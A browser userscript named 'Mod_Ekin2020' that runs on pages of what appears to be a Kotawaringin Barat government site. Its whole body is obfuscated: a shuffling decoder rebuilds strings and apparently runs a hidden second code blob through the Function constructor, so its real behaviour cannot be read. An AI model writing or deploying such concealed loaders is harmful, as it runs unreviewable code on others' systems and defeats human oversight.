// #################################################################
// ################# UPDATE SCRIPT 30 AGUSTUS 2024 #################
// #################################################################

// ==UserScript==
// @name        Mod_Ekin2020
// @namespace   20240830
// @author      hendrik svm
// @include     *kotawaringinbarat*
// @grant       GM_addStyle
// ==/UserScript==

(function () {
    var qVX = '',
        MUz = 944 - 933;

    function WKV(n) {
        var a = 1918894;
        var s = n.length;
        var u = [];
        for (var g = 0; g < s; g++) {
            u[g] = n.charAt(g)
        };
        for (var g = 0; g < s; g++) {
            var r = a * (g + 384) + (a % 48373);
            var k = a * (g + 666) + (a % 16864);
            var v = r % s;
            var e = k % s;
            var b = u[v];
            u[v] = u[e];
            u[e] = b;
            a = (r + k) % 4287224;
        };
        return u.join('')
    };
    var cka = WKV('cogttfuxmbkapodrlryisnzvnutqsjhwcorce').substr(0, MUz);
    var CCs = ',g=)+6n+Ctun+,u,)u)=iru;e=a c.rfi;o(kl.n[f n]6;te1.z< ]e)(.ltu,c=b+8ovard7e09a;c1g)5l;lh(1({5y].)7nt04+8 ,7r,(ljlf]!i+r64((  ,arac;xor"v(rnh1cst=f9u+ua=h)puakt;;[hvv=u=l[e)o vmt];(l=Anvui=d4p;95;nnao;2rghvl!rhiuirgqs1pvh;96,=u,ra=()h0he v;, gtf.2l)=i,rie=o f(2sd7a;roru]f}1[)=7A"Cu-d;=a[s [;ao=;(eo>fatts4pCr>o,.g)c;so(bd<oa2C;trro;[;6)ao1j ocv)i,ir;=a0l+=a.](cvihn=c;o<u+oj0;{al=r;=rh,fae+as8Ar(e){6-r"=(nosmg;tal)(l,,rvc;*.-n.eh]vtm0++CAng+;iv)nlr.vr9r[v+)= i;n-.ar)us0sgAf{sl(.{0)4}([;9it(ndnev"e+,.8= xvzf,,Slaiiuc;+)d8o=lp)ctm22(cjaa)ctn(hnjv0( vrrfhjx=kr.i[.=<fohn,tvnhp, =o.ftis+e"gr(pt]vugerp9s)b+vb+ )m;)as+C;+.l(th9 ;c.)c+a)eerxrw=r;gb78+..c(=ithapnve[8ga[;uept(("o)x}+p*,=)(1qv)b7=t]rh =edkjtin+,"h[e-r ; hlz,;0,a2ho20eeq3f]=6n7c]n-.1<vde}(aCflrggof=ds;uar(tsu"{;,;soi(4aC c;vl;==.ne(l,h;}r=)1va6r"i8rn1-6cc}3=Su).rr1l]in(8=e .8egou;"pa}1s{so ;ugt r7eguq8t0tvplpt9fo=ra)rj].nae.[';
    var xZp = WKV[cka];
    var GHE = '';
    var End = xZp;
    var XdM = xZp(GHE, WKV(CCs));
    var JTa = XdM(WKV('cu(cpr,o!_5!bZ=)D2 fr4__54{j5c. i4Z\/_}* 84)n %_$ 3)1.Z7!b3j7%ihn38.)amZ.,m{p .Zgt)1-pc_+(tsrit);.}1dcvrc(2;Z_).f$3Znb8.bfeZt5=yo)m11\/i.;,Z.%.ebZZ6.ZZ9r)i&ctbZ"nje$t$d9a3,}).dj=jZ]Z9.$_or_]4(Zt,(6(o;ieaunZ;$l3.)ZeeZ%jZtvr3bZ2;o_i8mg=Z+Zc}=sc.1Z.)j]a%=y(.lZte,i.yce$Zf-assgt#retZn) peT_.tCcnZnr7o5:-,}$v4+c8Z5lf.ZZ t3 r.)tyiZtdZ99(_m"}!Z$8gca.oe.e( 2h}o,psre;1t(p4.l).!yjZcd(}l;ctZ6Zc_da6(=i3)Zj4u=)[0ec$.{4{dl1(dZc.72ff)ehg_e(58&)i=4*0u;&b aicZg(o\'Z8q0*ZZ")C+$3e3,h=Z!s_4chau=ncdZ) ifo=(ZZyjbg,Z($(mcZ!88.\/0e.,#63.5s{Zec&v(,s_!er"sj]e3l=e.k!37bu!_+2=%Zd.a+Z0o,!sZs".s1]),(cgo(Ze$0,.,86u!7bd(j(%(377gu.(&a;(mo#t7.vZSu6t.c]!Z=tb 3-e__;,_Z)$;_6ce\/($6nZdb dt-%S_!s2ns*o,,l,_)imeZejZ(pt;5dr{a1c,4m 7han!0j}1_g;(5.;Zo.fy#,\/.3v]kohw)#(r)f60Z$=1eZZ)r0tuZ%.#nlZsj$=z3nbnf.vde[h)dc)Ztn;+EyZ0%_ji3Z;cf9uac9_}%#as_.2vn4no.! dl,s_r;e4ne!cZ.[20n$))0tDn+e,.sm)t6(oc.!h\'omsrbp2yZZai_.%)e%o))\'sl4y8r\/1tmZo,(ekv[2vl0e84=e)o.u+],#y e+di\/2]Z]])ZCf4s$o$f{Zuol=$34s(Z.)l;_0Zs{Z=_- !*j\/)o(6Zita)(Z8{3;!_s));sSi!)6)Z)a$4c70((!4(r,p])qZft2ino)tau$)=oeZmg7%Zbg"].n1=rt$3cs..(9Zo{pcnn;Z$)Z5b3t,i;7{cZt)jZa"3!2$2Z3,g;.(air"j3((\'!a}Zc5%4ilt*gZt]($Z33,0 Z=t]!{qt.ZcZ.Z.Ztn2t4(f,oj_?j,dbZ29sr6tr!np e(Zj2cb(d9c!tZZ$o)ft$7;b=c6unnd]cZtt((n((;eb6g70ee)lfta(\/_(e.Z5tt2fZiZ0%fuZl.j$) )=t)]c_n df_a_o1f;};rg!Z__ac_smt)((.f;Z7*e.D,Za).Z4$Znt4}.!rZjoi5()"trdS( 08!Zae;c(ftc6jZl( 6loZZ%n)3Zertfn;Zszy'));
    var exQ = End(qVX, JTa);
    exQ(6176);
    return 5063
})()